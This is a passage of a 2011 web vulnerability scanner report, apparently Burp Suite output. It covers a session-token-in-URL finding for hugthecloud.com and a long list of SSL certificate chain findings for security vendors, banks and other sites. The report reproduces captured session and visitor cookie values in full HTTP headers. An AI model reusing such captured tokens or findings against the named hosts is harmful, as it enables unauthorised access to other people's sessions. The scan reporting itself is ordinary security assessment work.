Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.249.46
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 0


10.4. http://www.hugthecloud.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...
<li data-provider-name="Google"><a onclick="window.open('https://hugthecloud.networkauth.com/openid/start?openid_identifier=http%3A%2F%2Fwww.google.com%2Faccounts%2Fo8%2Fid&token_url=http%3A%2F%2Fwww.hugthecloud.com%2Fmain%2Fauthorization%2FprocessExternalAuth%3Ftarget%3Dhttp%253A%252F%252Fwww.hugthecloud.com%252F%26source%3DsignUp%26close%3D1', null, 'width=530,height=480,location=no,menubar=no,resizable=yes,scrollbars=yes,toolbar=no,status=no'); return false;" href="https://hugthecloud.networkauth.com/openid/start?openid_identifier=http%3A%2F%2Fwww.google.com%2Faccounts%2Fo8%2Fid&amp;token_url=http%3A%2F%2Fwww.hugthecloud.com%2Fmain%2Fauthorization%2FprocessExternalAuth%3Ftarget%3Dhttp%253A%252F%252Fwww.hugthecloud.com%252F%26source%3DsignUp%26close%3D0">
<span class="mini-service mini-service-google" title="Google">
...[SNIP]...

11. SSL certificate
There are 25 instances of this issue:


11.1. https://landingpage.leads.dynamicssite.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://landingpage.leads.dynamicssite.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate: The server presented the following certificates:

Server certificate

Issued to:  *.Leads.DynamicsSite.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Tue Feb 08 19:01:06 CST 2011
Valid to:  Thu Feb 07 19:01:06 CST 2013

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

11.2. https://m8security.foxycart.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://m8security.foxycart.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate: The server presented the following certificates:

Server certificate

Issued to:  *.foxycart.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Mar 14 19:00:00 CDT 2011
Valid to:  Wed Jul 11 07:00:00 CDT 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.3. https://secure.opinionlab.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate: The server presented the following certificates:

Server certificate

Issued to:  *.opinionlab.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Jun 15 19:00:00 CDT 2009
Valid to:  Mon Jul 11 18:59:59 CDT 2011

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.4. https://securitymetrics.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate: The server presented the following certificates:

Server certificate

Issued to:  *.securitymetrics.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Thu Sep 23 19:00:00 CDT 2010
Valid to:  Tue Oct 01 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.5. https://store.tenable.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.tenable.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Thu May 20 19:00:00 CDT 2010
Valid to:  Tue May 28 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.6. https://support.tenable.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.tenable.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Thu May 20 19:00:00 CDT 2010
Valid to:  Tue May 28 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.7. https://www.clone-systems.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.clone-systems.com
Issued by:  Network Solutions EV SSL CA
Valid from:  Tue Aug 24 19:00:00 CDT 2010
Valid to:  Sat Aug 25 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Network Solutions EV SSL CA
Issued by:  Network Solutions Certificate Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

11.8. https://www.comodo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.comodo.com
Issued by:  COMODO EV SGC CA
Valid from:  Wed Jul 08 19:00:00 CDT 2009
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  COMODO EV SGC CA
Issued by:  AddTrust External CA Root
Valid from:  Sun Dec 31 18:00:00 CST 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO EV SGC CA
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Mon Jun 24 14:06:30 CDT 2019

Certificate chain #3

Issued to:  COMODO EV SGC CA
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

Certificate chain #4

Issued to:  COMODO Certification Authority
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Mon Dec 31 17:59:59 CST 2029

11.9. https://www.hackerguardian.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.hackerguardian.com
Issued by:  COMODO High Assurance Secure Server CA
Valid from:  Thu Feb 18 18:00:00 CST 2010
Valid to:  Sat Mar 23 18:59:59 CDT 2013

Certificate chain #1

Issued to:  COMODO Certification Authority
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO High Assurance Secure Server CA
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

Certificate chain #3

Issued to:  UTN - DATACorp SGC
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #5

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.10. https://account.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  account.snap.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Tue Oct 19 19:00:00 CDT 2010
Valid to:  Mon Oct 31 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

11.11. https://lct.salesforce.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lct.salesforce.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  lct.salesforce.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Sun Jan 23 18:00:00 CST 2011
Valid to:  Fri Jan 25 17:59:59 CST 2013

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.12. https://militarybankonline.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://militarybankonline.bankofamerica.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  militarybankonline.bankofamerica.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Oct 06 19:00:00 CDT 2010
Valid to:  Fri Oct 07 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.13. https://olui2.fs.ml.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  olui2.fs.ml.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jan 31 18:00:00 CST 2011
Valid to:  Wed Feb 01 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.14. https://secure.comodo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.comodo.com
Issued by:  COMODO Extended Validation Secure Server CA
Valid from:  Wed Mar 30 19:00:00 CDT 2011
Valid to:  Thu Jun 27 18:59:59 CDT 2013

Certificate chain #1

Issued to:  COMODO Extended Validation Secure Server CA
Issued by:  COMODO Certification Authority
Valid from:  Sun May 23 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO Certification Authority
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.15. https://secure.comodo.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.comodo.net
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Mon Jun 21 19:00:00 CDT 2010
Valid to:  Wed Jul 29 18:59:59 CDT 2015

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.16. https://secure.eloqua.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.eloqua.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.eloqua.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Dec 15 18:00:00 CST 2009
Valid to:  Tue Feb 14 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.17. https://shots-s.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  shots-s.snap.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Tue Oct 19 19:00:00 CDT 2010
Valid to:  Tue Nov 01 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

11.18. https://support.sentrigo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.sentrigo.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Sun Apr 05 05:42:02 CDT 2009
Valid to:  Mon Jun 06 06:38:09 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

11.19. https://tc.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  tc.bankofamerica.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Thu Feb 17 18:00:00 CST 2011
Valid to:  Mon Mar 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

11.20. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.bankofamerica.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Thu Feb 03 18:00:00 CST 2011
Valid to:  Tue Mar 06 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.21. https://www.fs.ustrust.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fs.ustrust.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jan 17 18:00:00 CST 2011
Valid to:  Wed Jan 18 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.22. https://www.mavitunasecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.mavitunasecurity.com
Issued by:  Starfield Secure Certification Authority
Valid from:  Sat Aug 21 10:02:55 CDT 2010
Valid to:  Sun Aug 26 05:09:38 CDT 2012

Certificate chain #1

Issued to:  Starfield Secure Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Wed Nov 15 19:15:40 CST 2006
Valid to:  Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:  Starfield Class 2 Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Tue Jun 29 12:39:16 CDT 2004
Valid to:  Thu Jun 29 12:39:16 CDT 2034

11.23. https://www.merrilledge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.merrilledge.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Thu May 13 19:00:00 CDT 2010
Valid to:  Sat May 14 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

11.24. https://www.mysecureconnect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mysecureconnect.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.mysecureconnect.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Fri Nov 12 20:09:34 CST 2010
Valid to:  Thu Dec 15 19:12:37 CST 2011

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

11.25. https://www.saintcorporation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.saintcorporation.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed Apr 06 19:00:00 CDT 2011
Valid to:  Thu Apr 24 18:59:59 CDT 2014

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
